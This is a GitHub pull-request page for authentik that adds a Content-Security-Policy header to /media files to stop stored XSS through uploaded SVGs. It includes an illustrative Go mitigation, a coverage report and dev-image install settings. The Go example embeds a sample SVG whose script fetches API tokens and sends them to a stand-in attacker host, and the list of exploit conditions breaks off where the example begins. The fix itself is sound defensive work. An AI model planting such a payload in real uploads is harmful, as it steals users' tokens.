goauthentik / authentik

The authentication glue you need.
https://goauthentik.io

internal: add CSP header to files in `/media` #12092

Closed gergosimonyi closed 1 day ago

gergosimonyi commented 2 days ago

This fixes a security issue of stored cross-site scripting via embedding JavaScript in SVG files by a malicious user with the `can_save_media` capability.

This can be exploited if:
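
The mitigation the PR title describes, as an added example that is not the PR's diff or authentik's own code: a Go wrapper around a `/media` file server that attaches a restrictive Content-Security-Policy so a user-uploaded SVG containing `<script>` or an `onload=` handler is still served as an image but cannot run script in authentik's origin when the URL is opened directly (an `<img>` embed never executes SVG script; direct navigation, `<object>` and `<iframe>` do). The policy string, the `/media/public/application-icons/` path and the sample SVG are assumptions for this example, not the header or files the PR uses.

```go
package main

import (
	"fmt"
	"io/fs"
	"net/http"
	"net/http/httptest"
	"testing/fstest"
)

// Constructed sample payload: an SVG carrying both an inline <script> and an
// onload= event handler, the shape of upload a user with can_save_media could
// store. Hypothetical content for this example; it is not taken from the PR.
const maliciousSVG = `<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.cookie)">
  <script>fetch('/api/v3/core/tokens/').then(r => r.text()).then(t => fetch('//attacker.invalid/?x=' + btoa(t)))</script>
  <rect width="10" height="10"/>
</svg>`

// MediaCSP is an assumed policy for this example, not necessarily the exact
// header the PR adds. With default-src 'none' and no script-src, the browser
// refuses inline <script> and on* handlers; 'sandbox' additionally gives the
// document an opaque origin, so even a script that somehow ran would have no
// access to authentik's cookies or API.
const MediaCSP = "default-src 'none'; style-src 'unsafe-inline'; sandbox"

// WithMediaHeaders attaches the CSP (and nosniff, so the declared
// image/svg+xml type is honoured) to every response of the wrapped handler.
func WithMediaHeaders(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		h := w.Header()
		h.Set("Content-Security-Policy", MediaCSP)
		h.Set("X-Content-Type-Options", "nosniff")
		next.ServeHTTP(w, r)
	})
}

// NewMediaServer serves files under /media/ from the given FS with the headers
// above; only that prefix is wrapped, other routes are untouched.
func NewMediaServer(files fs.FS) http.Handler {
	mux := http.NewServeMux()
	mux.Handle("/media/", http.StripPrefix("/media/", WithMediaHeaders(http.FileServer(http.FS(files)))))
	return mux
}

// MediaResponse captures the parts of the response a header check cares about.
type MediaResponse struct {
	Status      int
	CSP         string
	ContentType string
	Body        string
}

// ServeMedia performs an in-process GET so the example needs no network.
func ServeMedia(h http.Handler, path string) MediaResponse {
	rec := httptest.NewRecorder()
	h.ServeHTTP(rec, httptest.NewRequest(http.MethodGet, path, nil))
	res := rec.Result()
	return MediaResponse{
		Status:      res.StatusCode,
		CSP:         res.Header.Get("Content-Security-Policy"),
		ContentType: res.Header.Get("Content-Type"),
		Body:        rec.Body.String(),
	}
}

func main() {
	// In-memory stand-in for the media directory (assumed path layout).
	files := fstest.MapFS{
		"public/application-icons/evil.svg": {Data: []byte(maliciousSVG)},
	}
	srv := NewMediaServer(files)
	r := ServeMedia(srv, "/media/public/application-icons/evil.svg")
	// The file is served unchanged as an image, but the policy stops the
	// browser from running its script when the URL is opened directly.
	fmt.Printf("%d %s\nContent-Security-Policy: %s\n", r.Status, r.ContentType, r.CSP)
}
```

To confirm a deployed instance carries the fix, request any uploaded icon directly and look for the header, e.g. `curl -sI https://authentik.example.com/media/public/application-icons/icon.svg | grep -i content-security-policy`; an SVG that comes back without a policy and with `Content-Type: image/svg+xml` is still a script-capable document in the site's origin.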

codecov[bot] commented 2 days ago

Codecov Report

All modified and coverable lines are covered by tests :white_check_mark:

Project coverage is 44.89%. Comparing base (dc9de43) to head (1d275a8).

:white_check_mark: All tests successful. No failed tests found.

:exclamation: There is a different number of reports uploaded between BASE (dc9de43) and HEAD (1d275a8). HEAD has 8 uploads less than BASE:

| Flag | BASE (dc9de43) | HEAD (1d275a8) |
|------|------|------|
| e2e | 8 | 2 |
| unit | 2 | 0 |

Additional details and impacted files

```diff
@@            Coverage Diff             @@
##             main   #12092       +/-   ##
===========================================
- Coverage   92.60%   44.89%   -47.71%
===========================================
  Files         761      759        -2
  Lines       37929    37666      -263
===========================================
- Hits        35124    16911    -18213
- Misses       2805    20755    +17950
```

| Flag | Coverage Δ | |
|---|---|---|
| e2e | `43.59% <ø> (-5.50%)` | :arrow_down: |
| integration | `24.85% <ø> (ø)` | |
| unit | `?` | |

Flags with carried forward coverage won't be shown.


github-actions[bot] commented 1 day ago

authentik PR Installation instructions

Instructions for docker-compose

Add the following block to your `.env` file:

```shell
AUTHENTIK_IMAGE=ghcr.io/goauthentik/dev-server
AUTHENTIK_TAG=gh-1d275a8eef80995c094a3607f9dc01cb46b6ea8e
AUTHENTIK_OUTPOSTS__CONTAINER_IMAGE_BASE=ghcr.io/goauthentik/dev-%(type)s:gh-%(build_hash)s
```

For arm64, use these values:

```shell
AUTHENTIK_IMAGE=ghcr.io/goauthentik/dev-server
AUTHENTIK_TAG=gh-1d275a8eef80995c094a3607f9dc01cb46b6ea8e-arm64
AUTHENTIK_OUTPOSTS__CONTAINER_IMAGE_BASE=ghcr.io/goauthentik/dev-%(type)s:gh-%(build_hash)s
```

Afterwards, run the upgrade commands from the latest release notes.

Instructions for Kubernetes

Add the following block to your `values.yml` file:

```yaml
authentik:
  outposts:
    container_image_base: ghcr.io/goauthentik/dev-%(type)s:gh-%(build_hash)s
global:
  image:
    repository: ghcr.io/goauthentik/dev-server
    tag: gh-1d275a8eef80995c094a3607f9dc01cb46b6ea8e
```

For arm64, use these values:

```yaml
authentik:
  outposts:
    container_image_base: ghcr.io/goauthentik/dev-%(type)s:gh-%(build_hash)s
global:
  image:
    repository: ghcr.io/goauthentik/dev-server
    tag: gh-1d275a8eef80995c094a3607f9dc01cb46b6ea8e-arm64
```

Afterwards, run the upgrade commands from the latest release notes.
BeryJu commented 1 day ago

/cherry-pick version-2024.10